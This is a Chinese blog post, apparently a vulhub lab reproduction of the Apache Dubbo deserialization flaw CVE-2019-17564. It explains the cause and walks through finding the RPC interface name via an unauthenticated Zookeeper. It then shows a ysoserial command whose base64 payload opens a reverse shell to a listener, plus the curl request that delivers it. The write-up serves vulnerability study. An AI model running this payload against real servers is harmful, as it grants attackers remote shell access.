vulhub漏洞复现十二

vulhub漏洞复现十二,第1张

vulhub漏洞复现十二

CVE-2019-17564_Aapche Dubbo Java反序列化漏洞

漏洞原理

Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的`org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter`类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。

在Spring文档中,对`HttpInvokerServiceExporter`有如下描述,并不建议使用:

# WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead.

这个漏洞影响Apache Dubbo 2.7.4及以前版本,2.7.5后Dubbo使用`com.googlecode.jsonrpc4j.JsonRpcServer`替换了`HttpInvokerServiceExporter`。

环境搭建

靶  场:192.168.4.10_ubuntu

攻击机:192.168.4.10_kali

执行如下命令启动一个Apache Dubbo 2.7.3 Provider:

#docker-compose up -d

服务启动后,访问`http://your-ip:8080`,服务器默认会返回500错误。

 

漏洞复现

利用该漏洞需要先知道目标RPC接口名,而Dubbo所有的RPC配置储存在registry中,通常使用Zookeeper作为registry。如果能刚好找到目标的Zookeeper未授权访问漏洞,那么就可以在其中找到接口的名称与地址。

1. 连接zookeeper服务器

Vulhub对外开放了8080端口和2181端口,其中2181即为Zookeeper的端口,我们本地下载[Zookeeper](https://zookeeper.apache.org/),使用其中自带的**zkCli**即可连接到这台Zookeeper服务器:

# ./zkCli.sh -server target-ip:2181

 

2. 获取RPC接口名

连接后进入一个交互式控制台,使用`ls`即可列出其中所有节点,包括Dubbo相关的配置:

获取到RPC接口名为`org.vulhub.api.CalcService`。

 

3. 生成payload

直接用ysoserial生成CommonsCollections6的Payload作为POST Body发送到`http://your-ip:8080/org.vulhub.api.CalcService`即可触发反序列化漏洞:(执行代码base64编码)

```

java -jar ysoserial.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQuMjkvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" > 1.poc

```

 

4. 启动监听

5. 触发漏洞反dshell

curl -XPOST --data-binary @1.poc http://your-ip:8080/org.vulhub.api.CalcService

 

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5707646.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存